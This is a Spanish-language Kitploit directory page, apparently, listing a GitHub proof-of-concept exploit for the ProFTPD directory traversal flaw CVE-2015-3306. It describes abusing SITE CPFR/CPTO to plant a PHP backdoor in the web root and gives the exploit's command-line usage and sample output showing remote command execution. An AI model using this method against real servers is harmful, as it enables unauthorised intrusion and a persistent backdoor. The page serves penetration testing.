Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2015-3306 — Exploit PoC en Python para CVE-2015-3306 ProFTPD directory traversal. Copia archivos y coloca una puerta trasera PHP en la raíz web para ejecución remota de comandos mediante comandos FTP SITE CPFR/CPTO. | Kitploit
Herramientas/GitHubGitHub/donmedfor/cve-2015-3306
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubdonmedfor/cve-2015-3306

CVE-2015-3306

Exploit PoC en Python para CVE-2015-3306 ProFTPD directory traversal. Copia archivos y coloca una puerta trasera PHP en la raíz web para ejecución remota de comandos mediante comandos FTP SITE CPFR/CPTO.

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2015-3306 Exploit de ProFTPD

Este repositorio contiene un exploit proof-of-concept (PoC) en Python para CVE-2015-3306

⚠️ Advertencia: Utilícelo únicamente contra sistemas que posea o para los que tenga permiso explícito de prueba. La explotación no autorizada es ilegal.


Autor

Mohamed EL-KHAROUATI


Parte 1: CVE-2015-3306 Exploit de ProFTPD

Descripción

CVE-2015-3306 es una vulnerabilidad de directory traversal en ProFTPD 1.3.5b y anteriores. Este exploit permite copiar archivos arbitrarios y colocar un backdoor PHP en la raíz web. El backdoor puede ejecutar comandos de shell arbitrarios.

Características

  • Explota la vulnerabilidad de directory traversal mediante los comandos FTP SITE CPFR/CPTO.
  • Coloca un backdoor PHP (backdoor.php) en la raíz web especificada.
  • Ejecuta comandos de shell arbitrarios a través del backdoor.
  • Soporta comandos personalizados mediante --rcommand.
  • Requisitos

    • Python 3.x
    • Librería requests (pip install requests)

    Uso, Salida y Limpieza (Bloque de código único)

    root@kitploit:~
    # Ejecutar el exploit
    python3 exploit.py --rhost <ip_objetivo> --rport <puerto_ftp> --rpath <ruta_raíz_web> --rcommand <comando_shell>
    
    # Ejemplo:
    python3 exploit.py --rhost <ip_objetivo> --rport <puerto_ftp_objetivo> --rpath /var/www/html --rcommand whoami
    
    # Salida esperada:
    [+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
    [+] Exploiting <ip_objetivo> 
    [+] Running Command whoami
    [+] Target exploited, accessing shell at http://<ip_objetivo> /backdoor.php
    [+] Running whoami: www-data
    [+] Done
    
    Descargar herramienta